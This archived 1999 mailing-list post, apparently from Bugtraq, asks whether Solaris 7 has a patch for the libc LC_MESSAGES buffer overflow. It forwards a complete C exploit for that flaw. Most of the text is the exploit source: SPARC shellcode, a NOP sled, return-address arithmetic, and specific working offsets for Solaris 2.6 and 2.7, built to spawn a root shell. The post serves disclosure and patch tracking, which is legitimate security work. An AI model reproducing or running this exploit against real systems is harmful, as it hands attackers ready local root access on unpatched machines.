Hello, A previous message stated that the LC_MESSAGES bug in Solaris has been fixed in 7. However, I am still able to gain root with the below code on Sparc Solaris 7 5/99 Release boxes with MU2 and 7_Recommended patch set installed (offset 7152 gets root for me). Has there been a patch released for Solaris 7 that addresses this? Thanks for any help. Viraj. ---------- Forwarded message ---------- Date: Sun, 23 May 1999 14:25:26 +0100 From: acpizer <acpizerat_private> To: BUGTRAQat_private Subject: Re: Solaris libc exploit Hi guys, Below is a slightly modified exploit which will allow the user to specify the offset, the author has not provided offsets for 2.7/SPARC so here they are, any one of these can be used: 7144, 7152, 7160, 7168... Cheers. -- snip -- /*============================================================ ex_lobc.c Overflow Exploits( for Sparc Edition) The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551) Written by UNYUN (unewn4that_private) offsets for 2.7/SPARC: 7144, 7152, 7160, 7168, and more... offset for 2.6/SPARC: 5392 ============================================================ */ #define EV "LC_MESSAGES=" #define ADJUST 0 #define STARTADR 400 #define NOP 0xa61cc013 #define RETS 600 char x[80000]; char exploit_code[] = "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e" "\x2b\x0b\xda\xdc\xae\x15\x63\x68" "\x90\x0b\x80\x0e\x92\x03\xa0\x0c" "\x94\x10\x20\x10\x94\x22\xa0\x10" "\x9c\x03\xa0\x14" "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc" "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01" "\x91\xd0\x20\x08" ; unsigned long get_sp(void) { __asm__("mov %sp,%i0 \n"); } int i; unsigned int ret_adr; main(int argc, char *argv[]) { int OFFSET; putenv("LANG="); memset(x,'x',70000); if (argc == 2) OFFSET = atoi(argv[1]); else OFFSET = 5392; // default offset for 2.6 for (i = 0; i < ADJUST; i++) x[i]=0x40; for (i = ADJUST; i < 1000; i+=4){ x[i+3]=NOP & 0xff; x[i+2]=(NOP >> 8 ) &0xff; x[i+1]=(NOP >> 16 ) &0xff; x[i+0]=(NOP >> 24 ) &0xff; } for (i=0;i<strlen(exploit_code);i++) \ x[STARTADR+i+ADJUST]=exploit_code[i]; ret_adr=get_sp()-OFFSET; printf("jumping address : %lx, offset = %d\n",ret_adr, OFFSET); if ((ret_adr & 0xff) ==0 ){ ret_adr -=16; printf("New jumping address : %lx\n",ret_adr); } for (i = ADJUST+RETS; i < RETS+600; i+=4){ x[i+3]=ret_adr & 0xff; x[i+2]=(ret_adr >> 8 ) &0xff; x[i+1]=(ret_adr >> 16 ) &0xff; x[i+0]=(ret_adr >> 24 ) &0xff; } memcpy(x,EV,strlen(EV)); x[3000]=0; putenv(x); execl("/bin/rsh","su",(char *)0); } -- snip -- ------------------------------------------------------------------------------- "Probably you've only really grown up, when you can bear not being understood." Marian Gold /Alphaville
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:56:23 PDT